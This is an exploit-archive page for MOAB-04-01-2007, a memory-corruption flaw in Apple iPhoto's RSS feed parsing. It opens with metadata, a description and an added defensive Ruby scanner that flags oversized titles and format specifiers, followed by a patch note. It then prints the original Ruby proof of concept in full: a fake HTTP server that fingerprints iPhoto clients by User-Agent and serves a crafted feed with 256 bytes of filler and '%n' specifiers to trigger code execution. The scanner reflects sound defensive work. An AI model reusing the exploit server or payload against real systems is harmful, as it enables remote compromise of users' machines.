Proof of Concept for MOAB-04-01-2007 - exploit.company
Vendor: iPhoto
By: Kevin Finisterre
CVSS: 7.5 (HIGH)
Type: Remote Code Execution
CWE: 119
Product Name: iPhoto
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE: a:apple:iphoto
Metasploit:
Other Scripts:
Platforms Tested: macOS
Published: 2007

Proof of Concept for MOAB-04-01-2007

This is a proof-of-concept exploit for the MOAB-04-01-2007 vulnerability in iPhoto, Apple's photo management application for macOS. The bug is a buffer overflow in iPhoto's handling of XML feeds. The proof of concept runs a fake HTTP server that waits for a client whose User-Agent identifies it as iPhoto and then serves it a specially crafted RSS feed; when iPhoto parses that feed, the overflow is triggered and the attacker can execute arbitrary code on the client machine.
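A defender-side check, added here as an example and not part of the original proof of concept or of the Exploit-DB record: a small Ruby scanner that flags feed documents carrying the two visible traits of the payload below, an oversized `<title>` and printf-style format specifiers inside element text. The length threshold, the leaf-element regex and both sample feeds are constructed assumptions for the example.

```ruby
# Added example (not from the original PoC): heuristic scanner for RSS/XML
# feeds that flags the traits of the MOAB-04-01-2007 payload before a client
# such as iPhoto parses the document. Thresholds and sample feeds are
# constructed assumptions for this example.

# Assumption: no legitimate feed title or image URL exceeds this length.
MAX_TEXT_LEN = 200

# printf-style conversion specifiers; %n is the one that writes to memory.
FORMAT_SPEC = /%\d*(?:\.\d+)?[nxXsdiupc]/

# Leaf elements only: <name attrs>text</name> with no nested markup.
LEAF_ELEMENT = %r{<([A-Za-z_][\w:.-]*)[^>]*>([^<]*)</\1>}

# Returns an array of findings (hashes); empty when nothing looks suspicious.
def scan_feed(xml)
  findings = []
  xml.scan(LEAF_ELEMENT) do |name, text|
    if text.length > MAX_TEXT_LEN
      findings << { element: name, reason: :oversized, length: text.length }
    end
    specs = text.scan(FORMAT_SPEC)
    unless specs.empty?
      findings << { element: name, reason: :format_specifier, specifiers: specs }
    end
  end
  findings
end

# True when a proxy or feed fetcher should refuse to hand the document on.
def feed_suspicious?(xml)
  !scan_feed(xml).empty?
end

# Constructed sample: an ordinary photocast-style feed.
BENIGN_FEED = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <rss version="2.0" xmlns:aw="http://www.apple.com/ilife/wallpapers">
  <channel>
  <title>Holiday photos</title>
  <item>
  <title>Beach at sunset</title>
  <aw:image>http://feed.example.invalid/beach.jpg</aw:image>
  </item>
  </channel>
  </rss>
XML

# Constructed sample with the same channel-title shape as the PoC payload.
MALICIOUS_FEED = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <rss version="2.0" xmlns:aw="http://www.apple.com/ilife/wallpapers">
  <channel>
  <title>#{'A' * 256}%x.%n.%n.%n.%n.%n</title>
  <item>
  <title>In Gruber We Trust</title>
  <aw:image>http://feed.example.invalid/detonator.jpg</aw:image>
  </item>
  </channel>
  </rss>
XML

if __FILE__ == $0
  [["benign", BENIGN_FEED], ["malicious", MALICIOUS_FEED]].each do |label, feed|
    puts "#{label}: #{feed_suspicious?(feed) ? 'BLOCK' : 'allow'}"
    scan_feed(feed).each { |f| puts "  #{f[:element]}: #{f[:reason]}" }
  end
end
```

The check belongs in whatever sits between the network and the client, for example a filtering proxy or a feed-fetching service that validates content before it reaches iPhoto. It is a heuristic: the regex only sees leaf elements and does not handle CDATA sections or nested markup, so it complements the vendor patch rather than replacing it.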

Mitigation:

The vendor has released a patch for this vulnerability. It is recommended to update to the latest version of iPhoto to mitigate the risk of exploitation.

Exploit-DB raw data:

#!/usr/bin/ruby
#
# (c) 2006 LMH <lmh [at] info-pull.com>
# bug by Kevin Finisterre <kf_lists [at] digitalmunition.com>
# proof of concept for MOAB-04-01-2007
# see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb

require 'socket'

# Crafted RSS feed served to iPhoto. The channel <title> is the trigger:
# 256 bytes of filler followed by printf-style format specifiers.
IPHOTO_FEED = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" +
              "<rss version=\"2.0\" xmlns:aw=\"http://www.apple.com/ilife/wallpapers\">\r\n" +
              "<channel>\r\n" +
              "<title>" + ("A" * 256) + "%x.%n.%n.%n.%n.%n</title>\r\n" +
              "<item>\r\n" +
              "<title>In Gruber We Trust</title>\r\n" +
              "<aw:image>http://www.digitalmunition.com/digital_munitions_detonator.jpg\r\n" +
              "</aw:image>\r\n" +
              "</item>\r\n" +
              "</channel>\r\n" +
              "</rss>\r\n"

# Listening port; defaults to 80, which needs root on most systems.
web_port    = (ARGV[0] || 80).to_i

puts "++ Starting fake HTTP server at port #{web_port}."
web_server  = TCPServer.new(nil, web_port)
while (session = web_server.accept)
  # Read the request headers and pull out the User-Agent. Fall back to an
  # empty string so a request without that header does not raise on nil.
  request    = session.recvfrom(2000)[0]
  user_agent = request.scan(/User-Agent: (.*)/).flatten[0] || ""
  session.print "HTTP/1.1 200 OK\r\nServer: Unabomber/1.0\r\n"

  # Check if remote user-agent is iPhoto.
  if user_agent.scan(/iPhoto/).size < 1
    puts "-- User connected (#{session.peeraddr[3]}) but not running iPhoto, sending bullshit."
    session.print "Content-type: text/plain\r\n\r\n"
    session.print "All your Aunt Sophia are belong to us."
  else
    version = user_agent.scan(/iPhoto\/(.+?) /).flatten[0]
    puts "++ iPhoto #{version} user connected (#{session.peeraddr[3]}), " +
         "sending payload (#{IPHOTO_FEED.size} bytes)."
    session.print "Content-type: text/xml\r\n\r\n"
    session.print IPHOTO_FEED
  end

  session.close
end

# milw0rm.com [2007-01-04]